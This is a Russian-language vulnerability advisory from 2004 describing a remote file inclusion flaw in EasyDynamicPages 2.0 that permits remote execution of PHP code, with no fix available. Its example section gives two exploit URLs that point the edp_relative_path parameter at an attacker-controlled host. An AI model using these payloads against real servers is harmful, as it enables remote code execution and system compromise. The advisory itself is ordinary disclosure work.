Security Lab

Удаленное выполнение произвольного кода в EasyDynamicPages

Дата публикации:04.01.2004
Всего просмотров:924
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: EasyDynamicPages 2.x
Уязвимые версии: EasyDynamicPages 2.0

Описание: Уязвимость включения файла обнаружена в EasyDynamicPages. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.

Файлы '/admin/config.php' и '/dynamicpages/fast/config_page.php' включают файлы без проверки включаемых файлов. В результате удаленный пользователь может представить специально обработанный URL, который выполнит произвольный PHP файл, расположенный на удаленной системе.

Пример/Эксплоит:

http://[target]/admin/config.php/edp_relative_path=http://[attacker]/

http://[target]/dynamicpages/fast/config_page.p hp?do=add_page&du=site&edp_relative_path=http://attacker/

URL производителя: http://software.stoitsov.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: include() vuln in EasyDynamicPages v.2.0